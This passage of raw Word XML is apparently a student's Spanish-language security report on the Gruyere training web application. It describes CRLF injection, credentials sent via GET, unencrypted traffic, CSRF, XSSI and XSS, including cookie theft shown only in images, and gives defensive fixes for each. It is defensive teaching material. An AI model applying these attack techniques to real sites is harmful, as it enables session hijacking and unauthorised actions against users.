        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CRLF -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A70E3B" w14:textId="77777777" w:rsidR="00B52AC9" w:rsidRDefault="00B52AC9" w:rsidP="00B52AC9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473DC63C" w14:textId="77BA7050" w:rsidR="00D24202" w:rsidRDefault="00D24202" w:rsidP="00D24202">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24202">
        <w:t>Las cabeceras HTTP tienen la estructura "Clave: Valor", donde cada línea está separada por la combinación CRLF. Si la entrada del usuario es inyectada en la sección de valor sin apropiadamente esconder/eliminar los caracteres CRLF es posible alterar la estructura de las cabeceras HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703C63A" w14:textId="77777777" w:rsidR="00A64BEF" w:rsidRDefault="00A64BEF" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D26468" w14:textId="1F2B3DD4" w:rsidR="00E71D6D" w:rsidRDefault="00A64BEF" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Envió</w:t>
      </w:r>
      <w:r w:rsidR="00E17E37">
        <w:t xml:space="preserve"> de formulario por GET -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42371311" w14:textId="77777777" w:rsidR="00A64BEF" w:rsidRDefault="00A64BEF" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CF5D32" w14:textId="40B3E98F" w:rsidR="00A64BEF" w:rsidRDefault="00A64BEF" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Aquí tenemos un problema en él envió de los datos en la aplicación, básicamente cuando iniciamos sesión podemos ver el usuario y la contraseña en la URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982E8A4" w14:textId="3E4F84D9" w:rsidR="00A64BEF" w:rsidRDefault="00A64BEF" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Para evitar esto habría que cambiar el método HTTP, por el que se envían los datos, de método GET a método POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA848EF" w14:textId="0E369496" w:rsidR="00CA5384" w:rsidRDefault="00CA5384" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora mostraré una imagen de las </w:t>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:t>páginas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la aplicación web que usan GET, además de los datos que se envían:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE8B49" w14:textId="77777777" w:rsidR="00CA5384" w:rsidRDefault="00CA5384" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04480420" w14:textId="4656A014" w:rsidR="00CA5384" w:rsidRDefault="00CA5384" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA5384">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FCD96E4" wp14:editId="047E450B">
            <wp:extent cx="5108049" cy="4998085"/>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118952" cy="5008754"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D2E98E" w14:textId="77777777" w:rsidR="00CA5384" w:rsidRDefault="00CA5384" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42EA1F93" w14:textId="3BE7E50F" w:rsidR="00CA5384" w:rsidRDefault="00CA5384" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F265B3" w14:textId="77777777" w:rsidR="00A64BEF" w:rsidRDefault="00A64BEF" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A46DC37" w14:textId="5E52294E" w:rsidR="00A64BEF" w:rsidRDefault="00E71D6D" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conexión no encriptada -&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B138F" w14:textId="77777777" w:rsidR="00A64BEF" w:rsidRDefault="00A64BEF" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7359A600" w14:textId="4E345FAA" w:rsidR="003A00FD" w:rsidRDefault="00E71D6D" w:rsidP="00A64BEF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>El problema con esta vulnerabilidad sería que podrían capturar contraseñas, usuarios pues los datos que se envían en la aplicación no están cifrados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37719EAF" w14:textId="77777777" w:rsidR="00EF238F" w:rsidRDefault="00E71D6D" w:rsidP="00E71D6D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>En esta caso simplemente usando https, se podría solucionar este problema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D529358" w14:textId="77777777" w:rsidR="00EF238F" w:rsidRDefault="00EF238F" w:rsidP="00E71D6D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CC783F" w14:textId="08E99AAE" w:rsidR="00EF238F" w:rsidRDefault="00EF238F" w:rsidP="002F107A">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF238F">
        <w:t>XSRF/CSFR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C49C5B" w14:textId="77777777" w:rsidR="00B52AC9" w:rsidRDefault="00B52AC9" w:rsidP="00B52AC9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F64825F" w14:textId="05675F44" w:rsidR="00EF238F" w:rsidRDefault="00EF238F" w:rsidP="00EF238F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este ataque fuerza al navegador de la </w:t>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:t>víctima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> , validado en algún servicio, en este caso en la aplicación web de Gruyere, </w:t>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> realizar acciones que el usuario no quiere realizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD524E" w14:textId="77777777" w:rsidR="00EF238F" w:rsidRDefault="00EF238F" w:rsidP="00EF238F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Esta aplicación se encargará de realizar la acción elegida a través del navegador de la víctima, debido a que la actividad maliciosa será procesada en nombre del usuario con sesión iniciada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5C60E7" w14:textId="77777777" w:rsidR="00EF238F" w:rsidRDefault="00EF238F" w:rsidP="00EF238F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos usar como en el caso analizado eliminar todos los post de un usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCEB87" w14:textId="0EA25394" w:rsidR="00D21494" w:rsidRDefault="009F6A26" w:rsidP="00EF238F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Para solucionarlo podemos cambiar /deletesnippet para que funcione a través de POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D0E8A" w14:textId="2F58F42E" w:rsidR="009F6A26" w:rsidRDefault="009F6A26" w:rsidP="00EF238F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Pero esto no sería suficiente, necesitaríamos pasar un token de autentificación único e impredecible al usuario y requerir que sea enviado de vuelta antes de realizar la acción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9627B7" w14:textId="1EFA762A" w:rsidR="00D21494" w:rsidRDefault="00D21494">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XSSI -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0993DCAA" w14:textId="46139DB5" w:rsidR="00D21494" w:rsidRDefault="009F6A26" w:rsidP="009F6A26">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los navegadores impiden que las páginas de un dominio lean </w:t>
      </w:r>
      <w:r w:rsidR="00857F50">
        <w:t>páginas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de otros dominios. Pero no impiden que hagan referencia a páginas de otros dominios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B465F" w14:textId="3DBBD1FF" w:rsidR="009F6A26" w:rsidRDefault="009F6A26" w:rsidP="009F6A26">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>En concreto, permiten que las imágenes se rendericen desde otros dominios u que los scripts se ejecuten desde otros dominios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6973EEDD" w14:textId="186FA2E0" w:rsidR="009F6A26" w:rsidRDefault="009F6A26" w:rsidP="009F6A26">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si </w:t>
      </w:r>
      <w:hyperlink r:id="rId346" w:history="1">
        <w:r w:rsidRPr="005E55AF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>www.a.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> incluye un script alojado en </w:t>
      </w:r>
      <w:hyperlink r:id="rId347" w:history="1">
        <w:r w:rsidR="004F3291" w:rsidRPr="005E55AF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>www.google.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004F3291">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> , entonces ese script se ejecuta en el contexto de a no en el de Google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C2B10C" w14:textId="1FDFD9A3" w:rsidR="009F6A26" w:rsidRDefault="009F6A26" w:rsidP="009F6A26">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r>
        <w:t>Así que cualquier dato del usuario en ese script se filtrará.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7671AFD9" w14:textId="77777777" w:rsidR="00D21494" w:rsidRDefault="00D21494" w:rsidP="00D21494"/>
    <w:p w14:paraId="321D094C" w14:textId="62170354" w:rsidR="00D21494" w:rsidRDefault="00D21494" w:rsidP="00D21494">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para solucionar esto podemos usar un token para asegurarse de que los resultados JSON que contiene los datos confidenciales solo se devuelven a sus propias páginas, las páginas solo deberían soportar peticiones POST, lo que evita que el script se cargue mediante una etiqueta script, la última posibilidad es hacer que el script no sea ejecutable, la forma estándar es añadirle algún prefijo no ejecutable, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF238F">
        <w:t>como  ])}while(1);&lt;/x&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DD15A" w14:textId="77777777" w:rsidR="00D21494" w:rsidRDefault="00D21494" w:rsidP="00D21494">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A17349C" w14:textId="5DEC4EC1" w:rsidR="00E71D6D" w:rsidRPr="003A00FD" w:rsidRDefault="00E71D6D" w:rsidP="00EF238F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C291C" w14:textId="1B41D956" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483B7AA1" w14:textId="5E69A0B5" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FEEB7A3" w14:textId="4A4B505B" w:rsidR="004439F4" w:rsidRDefault="00CA5384" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18897514" w14:textId="320AABB2" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042BBD79" w14:textId="47621452" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B2721F" w14:textId="799A5DBA" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60348F06" w14:textId="019B8F4F" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D58DF5" w14:textId="77777777" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCDBC1D" w14:textId="77777777" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12101302" w14:textId="1A227450" w:rsidR="004439F4" w:rsidRDefault="004439F4" w:rsidP="004439F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78CF27" w14:textId="38C0C6D2" w:rsidR="00C21A09" w:rsidRDefault="00C21A09">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc128034196"/>
      <w:r w:rsidRPr="00064E32">
        <w:t>Informe</w:t>
      </w:r>
      <w:r w:rsidR="006A3109">
        <w:t xml:space="preserve"> técnico</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="569829F3" w14:textId="268E29F1" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109"/>
    <w:p w14:paraId="36EBD426" w14:textId="531990F5" w:rsidR="006A3109" w:rsidRPr="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Procederé a mostrar las vulnerabilidades encontradas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA8A62" w14:textId="64724162" w:rsidR="004439F4" w:rsidRDefault="006A3109" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc128034197"/>
      <w:r>
        <w:t>XSS -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E434BFC" w14:textId="4F6E397D" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId348" w:history="1">
        <w:r w:rsidRPr="008349F2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/xss/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A0569D" w14:textId="77777777" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365EB638" w14:textId="2A98F21F" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Los ataques de XSS son un tipo de inyección, en la que se inyectan scripts maliciosos en sitios web. Los fallos que permiten estos ataques tengan éxito están bastante extendidos y se producen en cualquier lugar en el que una aplicación web utilice la entrada de un usuario sin validarla ni codificarla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D60EF" w14:textId="5E4FC097" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Este es un ataque que influye en el cliente, es decir es un ataque al navegador no al servidor web, en este caso mediante las pruebas se consiguió enviar las cookies de sesión a otros dispositivo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C396C" w14:textId="6853B288" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF5047D" w14:textId="18CAF89D" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="004251E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E0F8AD2" wp14:editId="56BCD562">
            <wp:extent cx="5400040" cy="290258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2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB05D14" w14:textId="77777777" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB8D786" w14:textId="2EEB3A69" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Mostrar mensajes en el navegador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112C981A" w14:textId="76D3DBA2" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="389DCCEA" w14:textId="37BA45B1" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00707993">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DB55F50" wp14:editId="221FC44B">
            <wp:extent cx="5400040" cy="290258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040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="001065FB" w14:textId="1024F706" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7525546E" w14:textId="67257D07" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Hasta tomar el control del navegador:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243A651D" w14:textId="7C5E2E03" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44183103" w14:textId="098AD5A4" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="004F7585">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4798B23D" wp14:editId="6C18ABFC">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="232" name="Imagen 2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n 270" descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId281"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E32A80E" w14:textId="6865F2C1" w:rsidR="006A3109" w:rsidRDefault="006A3109" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21213C39" w14:textId="77777777" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="00E044A6">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>La manera más simple de corregir esta vulnerabilidad es usar un sistema de plantilla web, que escape automáticamente la salida y se consciente del contexto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52337CD9" w14:textId="6890C3A6" w:rsidR="006A3109" w:rsidRDefault="00E044A6" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>También en este caso podemos usar la clase sanitizer para agregar excepciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEB231" w14:textId="0CF6B115" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF43DB4" w14:textId="3A74A0F8" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Y en cuanto al XSS File Upload, o File Upload, enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId349" w:history="1">
        <w:r w:rsidRPr="008349F2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, lo que tenemos que hacer es modificar los métodos de la aplicación en donde se permitan subir ficheros y limitar por ejemplo a que sean solo PDF o TXT, como en el ejemplo de defensa proporcionado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27501519" w14:textId="4646331A" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="006A3109">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18177099" w14:textId="77777777" w:rsidR="00AC314A" w:rsidRDefault="00E044A6" w:rsidP="00F00B53">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc128034198"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Elevación de privilegios</w:t>
      </w:r>
      <w:r w:rsidR="00AC314A">
        <w:t xml:space="preserve"> y Manipulación de cookies -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="0E23502E" w14:textId="08EC3EE7" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="00AC314A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDDA69A" w14:textId="4238CE2A" w:rsidR="00E044A6" w:rsidRDefault="00E044A6" w:rsidP="00E044A6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enlace: </w:t>
      </w:r>
      <w:hyperlink r:id="rId350" w:history="1">
        <w:r w:rsidRPr="008349F2">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/es-es/windows-hardware/drivers/ifs/elevation-of-privilege</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
